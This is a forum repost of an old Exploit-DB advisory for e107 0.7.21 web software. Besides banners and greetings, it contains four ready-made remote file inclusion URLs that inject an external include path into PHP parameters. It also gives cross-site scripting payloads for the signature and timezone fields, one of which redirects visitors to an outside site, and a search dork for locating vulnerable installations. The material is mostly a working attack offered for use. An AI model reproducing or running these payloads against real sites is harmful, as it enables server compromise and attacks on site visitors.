Exploit e107 0.7.21 full - Remote File Inclusion / Cross-Site Scripting

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
12818
Проверка EDB
  1. Пройдено
Автор
INDOUSHKA
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
N/A
Дата публикации
2010-05-31
Код:
======================================================================= 

# e107 0.7.21 full Mullti (RFI/XSS) Vulnerabilities 

======================================================================= 

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 

0     _                   __           __       __                     1 

1   /' \            __  /'__`\        /\ \__  /'__`\                   0 

0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1 

1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0 

0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1 

1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0 

0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1 

1                  \ \____/ >> Exploit database separated by exploit   0 

0                   \/___/          type (local, remote, DoS, etc.)    1 

1                                                                      1 

0  [+] Site            : Inj3ct0r.com                                  0 

1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1 

0                                                                      0 

1                    ####################################              1 

0                  I'm indoushka member from Inj3ct0r Team             1 

1                    ####################################              0 

0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 

  

######################################################################## 

# Name: e107 0.7.21 full (RFI) Vulnerabilities 

# Vendor: http://e107.org/ 

# Date: 2010-05-27 

# Author : indoushka 

# Thanks to : Inj3ct0r.com,Exploit-DB.com,SecurityReason.com,Hack0wn.com ! 

# Contact : [email protected] 

# Home : www.arab-blackhat.co.cc

# Bug  : RFI 

# Tested on : windows SP2 Français V.(Pnx2 2.0) 
######################################################################## 
                                                                                                                               
# Dork : This site is powered by e107, which is released under the terms of the GNU GPL License.    
                                                                 
# Exploit By indoushka 

I - RFI:

1 - http://localhost/e107/fpw.php?THEMES_DIRECTORY=http://localhost/c.txt?

2 - http://localhost/e107/e107_handlers/secure_img_render.php?ifile=http://localhost/c.txt?

3 - http://localhost/e107/e107_plugins/content/handlers/content_class.php?plugindir=http://localhost/c.txt?

4 - http://localhost/e107/e107_plugins/content/handlers/content_convert_class.php?plugindir=http://localhost/c.txt?

II - XSS :

After Rigester Go to user Seting

1 - http://127.0.0.1/e107/usersettings.php

and Edit Signature / Timezone Put this code Or other's 

( ">"">>>><script>location="http://www.arab-blackhat.co.cc"</script>""""> )

( <ScRiPt>alert(213771818860)</ScRiPt> )


Dz-Ghost Team ===== Saoucha * Star08 * Redda * theblind74 * XproratiX * onurozkan * n2n * Meher Assel ====================
all my friend :
His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc)
Stake (www.v4-team.com) * r1z (www.sec-r1z.com) * D4NB4R * www.alkrsan.net * MR.SoOoFe * ThE g0bL!N
------------------------------------------------------------------------------------------------------------------------
 
Источник
www.exploit-db.com

Похожие темы